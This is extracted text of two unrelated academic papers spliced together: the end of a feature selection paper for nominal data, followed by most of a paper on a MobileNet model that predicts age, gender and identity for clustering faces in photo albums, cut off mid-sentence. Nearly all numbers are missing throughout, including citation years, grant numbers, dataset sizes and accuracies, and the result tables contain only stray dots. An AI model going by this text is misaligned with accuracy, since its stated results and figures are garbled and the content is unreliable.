in this paper, the novel algorithm redremovingmrlr, a method that aims to select features for nominal data, is proposed. the virtues of the proposed algorithm can be summarized as follows: (1) by forming several new information-related definitions for nominal data, such as the information amount, the conditional mutual information and the relevance degree, a series of corresponding improvements in their computation methods are presented; with these, the redremovingmrlr algorithm takes commonly used mifs-like forms, which enhances its feature selection performance and effectiveness; (2) a reasonable evaluation function makes the proposed algorithm fit for selecting features from nominal data.
however, the computational complexity does not increase, and feature selection for nominal data becomes easier; (3) by considering relevance and redundancy globally and rewriting the evaluation function of nmifs (estévez, tesmer & perez, ), which is then employed by redremovingmrlr, its redundancy-removing capability and robustness are enhanced; (4) our experimental results demonstrate the average advantage of redremovingmrlr over the mrlr and nmifs algorithms in terms of the size of the selected feature subset, the feature efficiency and the classification accuracy. improvements on these proposed methods will require further study. an estimation method of mi tailored to nominal data should be developed in the future rather than employing methods from other settings. the feature selection capability for nominal data with noisy and mixed features, as well as the improvement of the corresponding algorithms, will be investigated in succeeding studies.

additional information and declarations

funding
this work is supported by the future research projects funds for the science and technology department of jiangsu province (grant no. by - ) and the fundamental research funds for the ministry of education (grant no. jusrp a ). the funders had no role in study design, data collection and analysis, decision to publish, or preparation of the manuscript.

grant disclosures
the following grant information was disclosed by the authors:
science and technology department of jiangsu province: by - .
fundamental research funds for the ministry of education: jusrp a .

competing interests
the authors declare there are no competing interests.

author contributions
• zhihua li contributed reagents/materials/analysis tools, wrote the paper, reviewed drafts of the paper.
• wenqu gu conceived and designed the experiments, performed the experiments, analyzed the data, prepared figures and/or tables, performed the computation work.

data availability
the following information was supplied regarding data availability: uci repository of machine learning database, http://www.ics.uci.edu/~mlearn/mlrepository.

supplemental information
supplemental information for this article can be found online.

references
almuallim h, dietterich tg. learning with many irrelevant features. in: proceedings of the national conference on artificial intelligence. palo alto: aaai press.
battiti r. using mutual information for selecting features in supervised neural net learning. ieee transactions on neural networks.
blake c, merz c. uci repository of machine learning database [eb/ol]. available at http://www.ics.uci.edu/~mlearn/mlrepository.
brodley ce, utgoff pe. multivariate decision trees. machine learning.
chert j, yang z. an incremental clustering with attribute unbalance considered for categorical data. in: computational intelligence and intelligent systems, international symposium isica, huangshi, china. berlin, heidelberg: springer.
chow tws, wang p, ma ewm. a new feature selection scheme using a data distribution factor for unsupervised nominal data. ieee transactions on systems, man, and cybernetics, part b.
estévez pa, tesmer sm, perez ca et al. normalized mutual information feature selection. ieee transactions on neural networks.
gu w, li z.
mutual information-based feature selection algorithm for nominal data. computer engineering and applications, online. available at http://jsgg.chinajournal.net.cn/wkc/webpublication/paperdigest.aspx.
hou c, nie f, li x et al. joint embedding learning and sparse regression: a framework for unsupervised feature selection. ieee transactions on cybernetics.
hu q, xie z, yu d. hybrid attribute reduction based on a novel fuzzy rough model and information granulation. pattern recognition.
jain ak, duin rpw, mao j. statistical pattern recognition: a review. ieee transactions on pattern analysis and machine intelligence.
john gh, kohavi r, pfleger k. irrelevant features and the subset selection problem. machine learning: proceedings of the international conference.
kira k, rendel la. the feature selection problem: traditional methods and a new algorithm. in: aaai proceedings. palo alto: aaai press.
kwak n, choi c-h. input feature selection for classification problems. ieee transactions on neural networks.
kwak n, choi c-h. input feature selection by mutual information based on parzen window. ieee transactions on pattern analysis and machine intelligence.
liu z. construction of bayesian networks based on mutual information. dissertation. shanghai: fudan university.
li z, yang x, gu w et al. kernel-improved support vector machine for semanteme data. applied mathematics and computation.
minho k, ramakrishna rs. projected clustering for categorical datasets. pattern recognition letters.
modrzejejew m. feature selection using rough sets theory. in: proceedings of the european conference on machine learning. berlin, heidelberg: springer.
peng h, long f, ding c. feature selection based on mutual information: criteria of max-dependency, max-relevance, and min-redundancy. ieee transactions on pattern analysis and machine intelligence.
tang w, mao k. feature selection algorithm for data with both nominal and continuous features. in: advances in knowledge discovery and data mining, proceedings of the pacific-asia conference (pakdd), hanoi, vietnam. berlin, heidelberg: springer.
tang w, mao k. feature selection algorithm for mixed data with both nominal and continuous features. pattern recognition letters.
tesmer m, estévez pa. amifs: adaptive feature selection by using mutual information. in: proceedings of the ieee international joint conference on neural networks.
torkkola k. feature extraction by non-parametric mutual information maximization. journal of machine learning research.
efficient facial representations for age, gender and identity recognition in organizing photo albums using multi-output convnet

andrey v. savchenko
national research university higher school of economics, laboratory of algorithms and technologies for network analysis, nizhny novgorod, russia
samsung-pdmi joint ai center, st. petersburg department of steklov institute of mathematics, st. petersburg, russia

abstract
this paper is focused on the automatic extraction of persons and their attributes (gender, year of birth) from albums of photos and videos. a two-stage approach is proposed in which, firstly, a convolutional neural network simultaneously predicts age/gender from all photos and additionally extracts facial representations suitable for face identification. here the mobilenet is modified and is preliminarily trained to perform face recognition in order to additionally recognize age and gender. the age is estimated as the expected value of the top predictions of the neural network. in the second stage of the proposed approach, the extracted faces are grouped using hierarchical agglomerative clustering techniques. the birth year and gender of the person in each cluster are estimated by aggregating the predictions for individual photos. the proposed approach is implemented in an android mobile application. it is experimentally demonstrated that the quality of facial clustering for the developed network is competitive with the state-of-the-art results achieved by deep neural networks, though the implementation of the proposed approach is much computationally cheaper. moreover, this approach is characterized by more accurate age/gender recognition when compared to the publicly available models.

subjects artificial intelligence, computer vision
keywords facial representations, face clustering, age and gender recognition, convolutional neural networks

how to cite this article savchenko av. efficient facial representations for age, gender and identity recognition in organizing photo albums using multi-output convnet. peerj comput. sci. corresponding author andrey v. savchenko, avsavchenko@hse.ru. academic editor pinar duygulu. copyright savchenko, distributed under creative commons cc-by.

introduction
nowadays, due to the extreme increase in multimedia resources, there is an urgent need to develop intelligent methods to process and organize them (manju & valarmathie, ). for example, the task of automatic structuring of photo and video albums is attracting increasing attention (sokolova, kharchevnikova & savchenko, ; zhang & lu, ). the various photo organizing systems allow users to group and tag photos and videos in order to retrieve a large number of images in the media library (he et al., ). the most typical processing of a gallery includes the grouping of faces with automatic assignment of tags with the facial attributes (e.g., age and gender) to each subject in a group. the task of this paper is formulated as follows: given a large number of unlabeled
facial images, cluster the images into individual persons (identities) (he et al., ) and predict the age and gender of each person (rothe, timofte & van gool, ). this problem is usually solved using deep convolutional neural networks (convnets) (goodfellow, bengio & courville, ). at first, the clustering of photos and videos that contain the same person is performed using the known face verification (crosswhite et al., ; wang et al., ) and identification (savchenko & belova, ) methods. the age and gender of the extracted faces can be recognized by other convnets (eidinger, enbar & hassner, ; rothe, timofte & van gool, ). though such an approach works rather well, it requires at least three different convnets, which increases the processing time, especially if the gallery should be organized on mobile platforms in offline mode. moreover, every convnet learns its own face representation, and its quality can be limited by the small size of the training set or by the noise in the training data. for example, the latter issue is especially crucial for age prediction, as the most widely used imdb-wiki dataset contains incorrect ground-truth values of age due to mistakes in the year when the photo was taken; such mistakes are introduced by the automatic crawling procedure used by rothe, timofte & van gool ( ). therefore, the goal of this research is to improve the efficiency of facial clustering and age and gender prediction by learning a face representation via preliminary training on the domain of unconstrained face identification with a very large database. the contribution of this paper can be formulated as follows. firstly, a multi-output extension of the mobilenet (howard et al., ) is specially developed; it is pre-trained to perform face recognition using the vggface dataset (cao et al., ), and additional layers of the proposed network are fine-tuned for age and gender recognition on the adience (eidinger, enbar & hassner, ) and imdb-wiki (rothe, timofte & van gool, ) datasets. secondly, it is proposed to estimate the age of the person by computing the expected value of the top predictions in the age head of the proposed neural network. finally, a novel approach to face grouping is proposed, which deals with several challenges of processing real-world photo and video albums.

related works

face clustering

contemporary deep learning techniques (goodfellow, bengio & courville, ) can deal even with well-known crucial issues that appear in practical applications of face recognition, for example, the unconstrained environment (various illumination and pose, partial occlusion) (learned-miller et al., ), or the small sample size problem (savchenko, ), when usually only a single facial image per person is available. the latter problem is solved using transfer learning or domain adaptation methods (goodfellow, bengio & courville, ), in which large external datasets of celebrities are used to train a deep convnet (cao et al., ; parkhi, vedaldi & zisserman, ). one of the main tasks of this paper is to group (cluster) the images into the individual identities present in the given data with a large number of face images (he et al., ). in this task, transfer learning techniques with fine-tuning of the convnet on the new training set of persons of interest are impossible because the images are unlabeled; that is,
the setting is completely unsupervised. hence, traditional face clustering methods focus on finding an effective face representation or an appropriate dissimilarity measure between faces. the latter approach is examined by zhu, wen & sun ( ), who proposed a rank-order distance that measures the similarity between two faces using their neighboring information. shi, otto & jain ( ) designed a clustering algorithm that directly estimates the adjacency matrix based only on the similarities between face images; this allows a dynamic selection of the number of clusters and retains pairwise similarities between faces. however, the most accurate grouping in many practical tasks is still achieved by using reliable face representations with consecutive agglomerative clustering (zhang et al., b). in this case, the convnet is pre-trained on an external large dataset and is then applied to extract features of the images from the limited sample of subjects, using the embeddings at one of the last layers (sharif razavian et al., ; savchenko, ).

extraction of representative features (embeddings) is one of the most important tasks in face recognition. taigman et al. ( ) provided one of the first implementations of convnets for face verification using the deepface descriptor trained with a simple negative log-likelihood ('softmax') loss. various regularizations of the loss function have been studied in order to obtain suitable representations. for example, the center loss was proposed by wen et al. ( ) in order to simultaneously learn a center for the deep features of each class and penalize the distances between the deep features and their corresponding class centers. guo & zhang ( ) proposed an underrepresented-classes promotion loss term, which aligns the norms of the weight vectors of the underrepresented classes to those of the normal classes. the deep identification-verification features (deepid) are learned by alternating identification and verification phases with different loss functions (sun et al., ). facenet descriptors (schroff, kalenichenko & philbin, ) were trained using a special triplet loss with triplets of roughly aligned matching/non-matching face patches. recently, a family of angular and cosine margin-based losses has appeared. for example, the angular softmax loss was used to learn sphereface descriptors (liu et al., b). the arcface loss (deng et al., ) directly maximizes the decision boundary in the angular (arc) space based on the l2-normalized weights and features. however, it is worth noting that the usage of the softmax loss still gives the most accurate representations if the dataset is very large. cao et al. ( ) gathered the vggface- dataset with m photos of k subjects and trained conventional resnet-based networks, which achieve state-of-the-art results in various face recognition tasks. recently, research directions have shifted towards learning a compact embedding using convnets with low latency.
for example, wu et al. ( ) introduced the concept of the maxout activation and proposed a light convnet suitable for fast but still accurate face recognition.

facial attributes recognition

recognition of facial attributes appears in many practical applications. for instance, one of the goals of video analysis in retail is to fill advertisements with relevant information that is interesting to a target group. in this paper, it was decided to focus on age and gender (kharchevnikova & savchenko, ), which are the most important attributes in the automatic organization of a gallery of photos. a decade ago, traditional computer vision techniques, for example, classification of gabor features, were thoroughly studied (choi et al., ). nowadays, the most prominent results are achieved by deep convnets. for example, eidinger, enbar & hassner ( ) gathered the adience dataset and trained the gender_net and age_net models, which achieved very accurate classification. also, rothe, timofte & van gool ( ) provided the large imdb-wiki dataset and trained deep vgg convnets, which achieved state-of-the-art results in gender and age recognition. antipov et al. ( ) extended the paper of rothe, timofte & van gool ( ) and demonstrated that transfer learning with face recognition pre-training (rassadin, gruzdev & savchenko, ) is more effective for gender and age recognition than general pre-training on the imagenet dataset. unfortunately, the above-mentioned convnet-based methods are characterized by considerable memory consumption and computational complexity. more importantly, the size of the datasets with labeled age and gender attributes is rather small when compared to the datasets used for face recognition mentioned in the previous subsection. it is rather obvious that the closeness among the facial processing tasks can be exploited in order to learn efficient face representations that boost their individual performances. hence, one of the main parts of this paper is to use the embeddings trained for face identification in order to predict the age and gender of a given person.

there exist several studies that use such a multi-task approach. for instance, han et al. ( ) trained a single convnet to classify several facial attributes. simultaneous face detection, landmark localization, pose estimation, and gender recognition are implemented by a single convnet in the paper (ranjan, patel & chellappa, ). however, this model is primarily focused only on the rather simple task of localization of a facial region (face detection); it does not extract useful facial representations (features) and cannot be used in face identification and/or clustering. another important example of simultaneous facial analysis is presented in the patent application (yoo et al., ). the task solved by this invention is rather close to the task considered in this paper, namely, prediction of an identifier (id) and human attributes (age, gender, etc.) given a facial image using multi-task training. however, this device does not predict the birth year, as it only classifies the age range, that is, 'baby', 'child', ..., 'senior', etc. secondly, all the recognition tasks (id and facial attributes) are trained simultaneously in this invention, which requires the training set to include facial images with known id and all attributes. in practice, the existing face datasets do not include all this information.
hence, this method restricts the training set that can be used and, as a consequence, cannot provide the highest accuracy in all tasks. finally, this model predicts the id from a limited set of ids available in the training set. hence, it cannot be used for face identification with small training samples, because it does not implement domain adaptation and is restricted to the ids from the given training set. more importantly, it is impossible to apply this method for organizing photo albums in a completely unsupervised environment with unknown persons. it seems that there is still a lack of studies devoted to the simultaneous extraction of reliable representations and face attribute classification suitable for face grouping and age/gender prediction for each person using a set of his or her photos.

multi-output convnet for simultaneous age, gender, and identity recognition

in this paper, several different facial analytic tasks are considered. it is assumed that the facial regions are obtained in each image using any appropriate face detector, for example, either the traditional multi-view cascade viola–jones classifier or more accurate convnet-based methods (zhang et al., a). the gender recognition task is a binary classification problem, in which the obtained facial image is assigned to one of two classes (male and female). age prediction is a special case of a regression problem, though sometimes it is considered as a multi-class classification with, for example, $N$ different classes, so that it is required to predict whether an observed person is $1, 2, \ldots$ or $N$ years old (rothe, timofte & van gool, ). in such a case, these two tasks become very similar and can be solved by traditional deep learning techniques: a large facial dataset of persons with known age and/or gender is gathered, for example, the imdb-wiki (rothe, timofte & van gool, ); after that, a deep convnet is trained to solve the classification task, and the resulting networks can be applied to predict the age and gender of a new facial image.

the last task examined in this paper, namely unconstrained face identification, differs significantly from age and gender recognition. the unsupervised learning case is considered, in which facial images from a gallery set should be assigned to one of $C$ subjects (identities). domain adaptation (goodfellow, bengio & courville, ) is usually applied here: each image is described with an off-the-shelf feature vector using a deep convnet (sharif razavian et al., ), which has been preliminarily trained for supervised face identification on a large external dataset, for example, casia-webface, vggface/vggface2, or ms-celeb-1m. the l2-normalized outputs at one of the last layers of this convnet for the rth gallery image are used as the $D$-dimensional feature vector $\mathbf{x}_r = [x_{r,1}, \ldots, x_{r,D}]$. finally, any appropriate clustering method, for example, hierarchical agglomerative clustering (aggarwal & reddy, ), can be used to make a final decision for these feature vectors.

in most research studies, all these tasks are solved by independent convnets even when it is necessary to solve all of them. as a result, the processing of each facial image becomes time-consuming, especially for offline mobile applications (kharchevnikova & savchenko, ). in this paper, it is proposed to solve all these tasks by the same convnet.
in particular, it is assumed that the features extracted during face identification can be rather rich for any facial analysis. for example, it was shown the vggface features (parkhi, vedaldi & zisserman, ) can be used to increase the accuracy of visual emotion recognition (kaya, gürpnar & salah, ; rassadin, gruzdev & savchenko, ). as the main requirement in this study is the possibility to use the convnet on mobile platforms, it was decided to use straightforward modification of the mobilenet v (howard et al., ) (fig. ). this model contains sequentially connected savchenko ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ convolutional and depthwise convolutional layers, which proved to be memory efficient and provide excellent inference speed even on mobile devices. it is seven- and -times smaller than conventional resnet- and vgg models, respectively. what is more important, such small size of the model does not cause significant decrease of the recognition accuracy in various image recognition tasks. for example, top- accuracy on imagenet- of the mobilenet v ( . %) is only . % and . % lower when compared to the accuracy of vgg and resnet- , respectively. the bottom (backbone) part of the proposed network, namely, conventional mobilenet v pre-trained on imagenet- , extracts the representations suitable for face identification. the top part contains one new hidden layer with dropout regularization after extraction of identity features and two independent fully connected layers with softmax and sigmoid outputs for age and gender recognition, respectively. the learning of this model is performed incrementally, at first, the base mobilenet is trained for face identification on a very large facial dataset using conventional cross-entropy (softmax) loss. next, the last classification layer is removed, and the weights of the mobilenet base are frozen. finally, the remaining layers in the head are learned for age and gender recognition tasks by minimizing the sum of cross-entropies for both outputs. it is necessary to emphasize that not all images in most datasets of facial attributes contain information about both age and gender. moreover, some attribute may be completely unknown, if several datasets are united. as a result, the number of faces with both age and gender information is several times smaller when compared to the whole number of facial images. finally, the gender data for different ages is also very imbalanced. figure proposed convnet. full-size doi: . /peerj-cs. /fig- savchenko ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ thus, it was decided to train both heads of the convnet (fig. ) independently using different training data for age and gender classification. in particular, i alternate the mini-batches with age and gender info, and train only the part of the proposed network, that is, the weights of the fully connected layer in the age head of the proposed model are not updated for the mini-batch with the gender info. this convnet has the following advantages. first of all, it is obviously very efficient due to either usage of the mobilenet backbone or the possibility to simultaneously solve all three tasks (age, gender, and identity recognition) without need to implement an inference in three different networks. 
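the architecture and the incremental training step described above can be sketched in keras roughly as follows; the layer sizes, dropout rate, number of age classes and optimizer settings are assumptions of this sketch rather than the exact configuration used in the paper.

```python
# sketch of the multi-output ConvNet: MobileNet backbone, a hidden layer with
# dropout, and independent age (softmax) and gender (sigmoid) heads.
import tensorflow as tf
from tensorflow.keras import layers, models

NUM_AGE_CLASSES = 100  # assumed number of age classes

backbone = tf.keras.applications.MobileNet(include_top=False, pooling="avg",
                                           input_shape=(224, 224, 3))
# in the paper the backbone is first trained for face identification and then frozen;
# here the default weights merely stand in for that pre-training step.
backbone.trainable = False

identity_features = backbone.output  # later used for face clustering/identification
hidden = layers.Dropout(0.5)(layers.Dense(1024, activation="relu")(identity_features))
age_head = layers.Dense(NUM_AGE_CLASSES, activation="softmax", name="age")(hidden)
gender_head = layers.Dense(1, activation="sigmoid", name="gender")(hidden)

model = models.Model(backbone.input, [age_head, gender_head])
model.compile(optimizer="adam",
              loss={"age": "categorical_crossentropy", "gender": "binary_crossentropy"})

# alternating training (illustrative): mini-batches carrying only age labels update
# the age head, and mini-batches carrying only gender labels update the gender head,
# e.g. by passing zero sample weights for the missing output.
```

freezing the backbone preserves the identity features needed for clustering, while the two lightweight heads remain cheap to train on the smaller attribute datasets.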
secondly, in contrast to the publicly available datasets for age and gender prediction, which are rather small (compared to the datasets for face recognition) and dirty, the proposed model exploits the potential of very large and clean face identification datasets to learn a very good face representation. moreover, the hidden layer between the identity features and the two outputs further combines the knowledge necessary to predict age and gender. as a result, the proposed model makes it possible to increase the accuracy of age/gender recognition when compared to the models trained only on specific datasets; for example, imdb-wiki or adience. proposed pipeline for organizing photo and video albums the complete data flow of the usage of the convnet (fig. ) for organizing albums with photos and videos is presented in fig. . (figure caption: proposed pipeline.) here faces in each photo are detected using the mtcnn (multi-task convolutional neural network) (zhang et al., a). next, an inference in the proposed convnet is performed for all detected faces in order to extract the d-dimensional identity feature vector x_r and predict age and gender. the current age a_r of the rth person is estimated by adding the difference between the current date and the photo creation date to the predicted age. after that, all faces are clustered using the following dissimilarity measure between identity features and birth year predictions of two facial images x_r and x_j:

\rho(x_r, x_j) = \|x_r - x_j\|^2 + w \left( \frac{a_r - a_j}{a_r + a_j} \right)^2, ( )

where \|\cdot\| is the l2 (euclidean) norm and w is a fixed non-negative weight (e.g., . ) of linear scalarization. the second term of ( ) was chosen for the age distance in order to maximize the difference between small babies, who usually have similar identity features. as the number of subjects in the photo albums is usually unknown, hierarchical agglomerative clustering is used (aggarwal & reddy, ). only rather large clusters with a minimal number of faces are retained during the cluster refinement. the gender and the birth year of a person in each cluster are estimated by appropriate fusion techniques (kharchevnikova & savchenko, , ); for example, simple voting or maximizing the average posterior probabilities at the output of the convnet (fig. ). for example, the product rule (kittler et al., ) can be applied if the independence of all facial images x_r, r \in \{r_1, \dots, r_M\}, in a cluster is naively assumed:

\max_{n \in \{1, \dots, N\}} \prod_{m=1}^{M} p_n(x_{r_m}) = \max_{n \in \{1, \dots, N\}} \sum_{m=1}^{M} \log p_n(x_{r_m}), ( )

where N is the total number of classes and p_n(x_{r_m}) is the nth output of the convnet for the input image x_{r_m}. the same procedure is repeated for all video files. only every third or fifth frame, for example, is selected in each video clip; identity features of all detected faces are extracted, and the faces found in this clip are initially clustered. after that, the normalized averages of the identity features of all clusters (sokolova, kharchevnikova & savchenko, ) are computed. they are added to the dataset {x_r} so that the "facial clustering" module handles both the features of all photos and the average feature vectors of subjects found in all videos.
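a short numpy illustration of the dissimilarity ( ) and of the product rule ( ) is given below; the weight value, the small additive constant inside the logarithm and the array shapes are assumptions of this sketch.

```python
# sketch of the pairwise dissimilarity (identity features plus relative age term)
# and of the product-rule fusion of per-face posteriors within one cluster.
import numpy as np

def dissimilarity(x_r, x_j, a_r, a_j, w=1.0):
    """distance ( ): squared euclidean distance of identity features plus a weighted
    squared relative difference of predicted current ages (w is a placeholder)."""
    return np.sum((x_r - x_j) ** 2) + w * ((a_r - a_j) / (a_r + a_j)) ** 2

def product_rule(posteriors):
    """product-rule fusion ( ): `posteriors` is an (M, N) array with one row of class
    probabilities per facial image of a cluster; returns the index of the winning class."""
    return int(np.argmax(np.sum(np.log(posteriors + 1e-10), axis=0)))
```

the same fusion routine can be applied both to the gender posteriors of a photo cluster and to the frame-level predictions of a video clip.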
let me summarize the main novel parts of this pipeline. firstly, the simple age prediction by maximizing the output of the corresponding head of the proposed convnet is not accurate due to the imbalance of the described training set, which leads to decisions in favor of one of the majority classes. hence, it was decided to aggregate the outputs {p_a(x_r)} of the age head. however, i experimentally found that the combination of all outputs is again inaccurate, because the majority of subjects in the training set are – years old. thus, it is proposed to choose only L ∈ { , , ..., N_a} indices {a_1, ..., a_L} of the maximal outputs, where N_a is the number of different age classes. next, the expected mean age \bar{a}(x_r) for each gallery facial image x_r is computed using the normalized top outputs as follows:

\bar{a}(x_r) = \frac{\sum_{l=1}^{L} a_l \, p_{a_l}(x_r)}{\sum_{l=1}^{L} p_{a_l}(x_r)} . ( )

secondly, the birth year of each face is estimated by subtracting the predicted age from the image file creation date. in such a case, it will be possible to organize very large albums gathered over the years. the predicted birth year is used as an additional feature during the cluster analysis in order to partially overcome the known similarity of young babies in a family. the distance between two faces is computed as the sum of the distance between facial features and the appropriately scaled distance ( ) between predicted current ages with respect to the photo creation dates. finally, several tricks in the cluster refinement module were implemented (fig. ). at first, the different faces appearing in the same photo are specially marked. as such faces must be stored in different groups, complete linkage clustering of every facial cluster is additionally performed. the distance matrix is designed so that the distances between the faces in the same photo are set to the maximum value, which is much larger than the threshold applied when forming flat clusters. moreover, it is assumed that the most valuable clusters of an owner of a mobile device, his or her friends and relatives, should not contain photos/videos taken on only one day. hence, a certain threshold ( day by default) for the number of days between the earliest and the latest photo in a cluster is set in order to filter out the large quantity of unimportant casual faces. the proposed approach (fig. ) was implemented as a part of a special mobile application for android (fig. ). the application may operate in offline mode and does not require an internet connection. it sequentially processes all photos from the gallery in a background thread. the demography pane provides stacked histograms (fig. a) of facial attributes of the largest extracted clusters (family members and friends). (figure caption: results of organization of the gallery in the mobile demo. photo credit: andrey v. savchenko.) tapping on each bar within the horizontal stacked histogram in fig. a causes the list of all photos of a particular individual to be displayed (fig. b). it is important to emphasize at this point that entire photos rather than just the faces extracted therefrom are presented in the display form of the application, so that photos with several persons can be exposed.
if there are plural individuals with an identical gender and age range, then a spinner (combo box) can be provided on top of the display form, and that spinner is usable to select a particular person by an associated sequential number (fig. c). experimental results. details of the training procedure. in order to test the described approach (fig. ), i implemented it in special software (https://github.com/hse-asavchenko/hse_facerec_tf/tree/master/age_gender_identity) using the python language with the tensorflow and keras frameworks and the scikit-learn/scipy/numpy libraries. my fine-tuned cnns are publicly available. the network (fig. ) has been trained as follows. at first, the weights of the backbone mobilenet are learned for the face identification problem using , , facial images of , subjects from the vggface dataset (cao et al., ). this base cnn was trained for epochs with early stopping on a validation set of , other images, using the adam optimizer of the softmax loss with learning rate . and decay e- . next, i populated the training dataset with k frontal cropped facial images from the imdb-wiki dataset (rothe, timofte & van gool, ). unfortunately, the age groups in this dataset are very imbalanced, so the trained models work incorrectly for faces of very young or old people. hence, it was decided to add all ( k) images from the adience (eidinger, enbar & hassner, ) dataset. as the latter contains only age intervals, for example, "( – )," "( – )," i assigned all images from such an interval to its middle age, for example, " " or " ." the resulting training set contains partially overlapping , images with a gender label and , images with an age label. the validation set includes other , labeled images with both age and gender available. in this study both age and gender recognition tasks are treated as classification problems with n_g = (male/female) and ( , , ... years old) classes, respectively. the proposed network is fine-tuned on the gathered dataset in order to minimize the following joint loss function

L = - \sum_{g \in G} \log p_{n_g}(x_g) - \sum_{a \in A} \log p_{n_a}(x_a), ( )

which is computed as the sum of the gender binary cross-entropy loss and the age categorical cross-entropy loss. here p_n(x) is the nth output of the convnet for the input image x, that is, the estimate of the posterior probability of the nth class; G is the set of indices g of images in the training set with known gender label n_g; similarly, the set A contains the indices a of training images with given age n_a. in order to compute the above-mentioned cross-entropy loss functions, one-hot encoding is used for both age and gender labels. the top part of the network (fig. ) with frozen weights of the base cnn has been learned for three epochs using the adam optimizer of the loss ( ) with alternate age/gender batches. as a result, % and % validation accuracies were obtained for age and gender, respectively. if the whole network including the backbone mobilenet is fine-tuned for one epoch using the sgd optimizer with learning rate e- , these accuracies are increased to % and %, but the quality of identity features suitable for face recognition obviously decreases. facial clustering. in this subsection, an experimental study of the proposed system (fig. ) is provided for the facial clustering task on images gathered in unconstrained environments. the identity features extracted by the base mobilenet (fig.
) are compared to the publicly available convnets suitable for face recognition, namely, the vggface (vggnet- ) (parkhi, vedaldi & zisserman, ) and the vggface (resnet- ) (cao et al., ). the vggface, vggface , and mobilenet extract d = , , d = , , and d = , non-negative features in the output of “fc ,” “pool _ x _s ,” and “reshape_ /mean” layers from � rgb images, respectively. all hierarchical clustering methods from scipy library are used with the euclidean (l ) distance between feature vectors. as the centroid and the ward’s linkage showed very poor performance in all cases, only results for single, average, complete, weighted, and median linkage methods are reported. in addition, the rank-order clustering (zhu, wen & sun, ) was implemented, which was specially developed for organizing faces in photo albums. the parameters of all clustering methods were tuned using % of each dataset. the following clustering metrics were estimated with the scikit-learn library: adjusted rand index, adjusted mutual information, homogeneity, and completeness. in addition, the average number of extracted clusters k relative to the number of subjects c and the bcubed f-measure are computed. the latter metric is widely applied in various tasks of grouping faces (he et al., ; zhang et al., b). in the experiments the following testing data were used. � subset of labeled faces in the wild (lfw) dataset (learned-miller et al., ), which was involved into the face identification protocol (best-rowden et al., ). c = subjects who have at least two images in the lfw database and at least one video in the youtube faces (ytf) database (subjects in ytf are a subset of those in lfw) are used in all clustering methods. � gallagher collection person dataset (gallagher & chen, ), which contains labeled faces with c = identities in each of the images. as only eyes positions are available in this dataset, i preliminarily detect faces using mtcnn (zhang et al., a) and chose the subject with the largest intersection of facial region with given eyes region. if the face is not detected, a square region with the size chosen as a . -times distance between eyes is extracted. � grouping faces in the wild (gfw) (he et al., ) with preliminarily detected facial images from real users’ albums from a chinese social network portal. the size of an album varies from to , faces, with a maximum number of identities of c = . savchenko ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ the average values of clustering performance metrics are presented in tables – for lfw, gallagher, and gfw datasets, respectively. the average linkage is the best method according to most of the metrics of cluster analysis. the usage of the rank-order distance (zhu, wen & sun, ) is not appropriate due to rather low performance. moreover, this distance requires an additional threshold parameter for the cluster-level rank-order distance. finally, the computational complexity of such clustering is three to four times higher when compared to other hierarchical agglomerative clustering methods. one of the most important conclusion here is that the trained mobilenet (fig. ) is in most cases more accurate than the widely used vggface. as expected, the quality of the proposed model is slightly lower when compared to the deep resnet- convnet trained on the same vggface dataset. surprisingly, the highest bcubed f-measure for the most complex gfw dataset ( . ) is achieved by the proposed model. 
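the bcubed f-measure is not part of scikit-learn, so the evaluation can be reproduced with a small helper such as the one below (a sketch prepared for this text, not the author's evaluation code); the remaining metrics are taken directly from sklearn.metrics.

```python
# BCubed precision/recall/F-measure of a flat face clustering.
import numpy as np
from sklearn.metrics import adjusted_rand_score, adjusted_mutual_info_score

def bcubed_f_measure(true_ids, cluster_ids):
    true_ids, cluster_ids = np.asarray(true_ids), np.asarray(cluster_ids)
    precision, recall = [], []
    for i in range(len(true_ids)):
        same_cluster = cluster_ids == cluster_ids[i]
        same_subject = true_ids == true_ids[i]
        correct = np.sum(same_cluster & same_subject)
        precision.append(correct / np.sum(same_cluster))
        recall.append(correct / np.sum(same_subject))
    p, r = np.mean(precision), np.mean(recall)
    return 2 * p * r / (p + r)

# the other reported metrics, e.g.:
# ari = adjusted_rand_score(true_ids, cluster_ids)
# ami = adjusted_mutual_info_score(true_ids, cluster_ids)
```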
this value is slightly higher than the best bcubed f-measure ( . ) reported in the original paper (he et al., ). however, the most important advantages of the proposed model from the practical point of view are excellent run-time/space complexity. for example, the inference in the proposed model is – -times faster when compared to the vggface and vggface . moreover, the dimensionality of the feature vector is two to four times lower leading to the faster computation of a distance matrix in a clustering method. in addition, the proposed model makes it possible to simultaneously predict age and gender of observed facial image. table clustering results, lfw subset (c = subjects). k/c ari ami homogeneity completeness f-measure single vggface . . . . . . vggface . . . . . . proposed model . . . . . . average vggface . . . . . . vggface . . . . . . proposed model . . . . . . complete vggface . . . . . . vggface . . . . . . proposed model . . . . . . weighted vggface . . . . . . vggface . . . . . . proposed model . . . . . . median vggface . . . . . . vggface . . . . . . proposed model . . . . . . rank-order vggface . . . . . . vggface . . . . . . proposed model . . . . . . note: the best results in each column are marked in bold. savchenko ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ table clustering results, gallagher dataset (c = subjects). k/c ari ami homogeneity completeness f-measure single vggface . . . . . . vggface . . . . . . proposed model . . . . . . average vggface . . . . . . vggface . . . . . . proposed model . . . . . . complete vggface . . . . . . vggface . . . . . . proposed model . . . . . . weighted vggface . . . . . . vggface . . . . . . proposed model . . . . . . median vggface . . . . . . vggface . . . . . . proposed model . . . . . . rank-order vggface . . . . . . vggface . . . . . . proposed model . . . . . . note: the best results in each column are marked in bold. table clustering results, gfw dataset (in average, c = subjects). k/c ari ami homogeneity completeness f-measure single vggface . . . . . . vggface . . . . . . proposed model . . . . . . average vggface . . . . . . vggface . . . . . . proposed model . . . . . . complete vggface . . . . . . vggface . . . . . . proposed model . . . . . . weighted vggface . . . . . . vggface . . . . . . proposed model . . . . . . median vggface . . . . . . vggface . . . . . . proposed model . . . . . . rank-order vggface . . . . . . vggface . . . . . . proposed model . . . . . . note: the best results in each column are marked in bold. savchenko ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ though the main purpose of this paper is face grouping 